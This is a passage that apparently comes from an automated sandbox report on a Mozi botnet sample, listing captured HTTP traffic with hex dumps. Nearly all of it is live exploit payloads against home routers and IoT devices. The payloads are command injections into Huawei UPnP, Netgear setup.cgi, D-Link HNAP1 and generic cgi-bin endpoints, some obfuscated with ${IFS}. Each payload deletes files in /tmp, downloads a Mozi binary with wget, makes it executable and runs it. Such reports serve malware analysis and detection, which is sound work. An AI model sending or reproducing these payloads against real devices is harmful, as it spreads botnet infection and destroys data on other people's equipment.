77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 45.235.96.233:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 193.43.84.80:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 188.67.162.193:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 177.127.106.224:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 180.202.76.110:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 9.138.25.110:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 1.21.252.212:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 56.119.30.94:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x 